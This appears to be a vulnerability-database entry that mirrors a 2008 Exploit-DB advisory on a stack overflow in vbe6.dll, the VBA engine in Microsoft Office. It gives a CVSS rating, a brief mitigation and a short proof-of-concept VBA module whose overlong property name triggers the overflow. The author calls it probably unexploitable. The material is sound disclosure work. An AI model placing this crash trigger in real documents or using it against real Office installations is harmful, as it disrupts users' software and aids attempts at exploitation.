Stack overflow in vbe6.dll

vendor:

MS Office

by:

Marsu

8.8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: MS Office

Affected Version From: All versions of MS Office

Affected Version To: All versions of MS Office

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The overflow occurs in Visual Basic for Application. Creating a property with a long name (about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.

Mitigation:

Ensure that the length of the property name is within the expected range.

Source

Exploit-DB raw data:

Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application. 
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.

Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P

Marsu <Marsupilamipowa@hotmail.fr>

Module1.bas:

Attribute VB_Name = "Module1"

Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
  
End Property

# milw0rm.com [2008-03-30]